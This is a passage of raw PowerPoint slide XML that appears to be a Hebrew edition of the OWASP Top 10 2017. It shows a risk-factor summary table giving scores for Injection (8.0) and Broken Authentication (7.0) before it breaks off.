          <a:effectRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custData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4" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3475196072"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="1286830"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="334800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>סיכום עשרת גורמי הסיכון</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="951550">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>הטבלה הבאה מציגה סיכום של העשרת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הפגיעויות לשנת 2017 בנושא סיכוני פיתוח מאובטח, ואת גורמי הסיכון אשר שייכנו לכל סיכון. גורמים אלו נקבעו בהתבסס על מידע סטטיסטי שנאסף והניסיון של צוות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. על-מנת להבין סיכונים אלו עבור יישום ספציפי או ארגון, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>עליך לשקול את גורמי האיום הספציפיים ואת ההשפעה העסקית</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. אפילו חולשות חמורות בתוכנה לא יציגו סיכון חמור במידה ואין גורמי איום אשר עשויים לגרום להתקפה המבוקשת או שהשפעה העסקית זניחה עבור הנכסים המעורבים.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcP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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2020614841"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2209800"/>
          <a:ext cx="6842248" cy="4421001"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1217284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="504000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1106043">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="504000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="414000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="618423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>סיכון</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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rtl="1"/>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ציון</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - הזרקת קוד זדוני (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחה: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חמורה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>8.0</a:t>
                      </a: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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A2:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - הזדהות שבורה</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="18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rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>קלה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחה: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ממוצעת: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חמורה: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="800" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יישום ספציפי</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>7.0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>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xmlns="" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
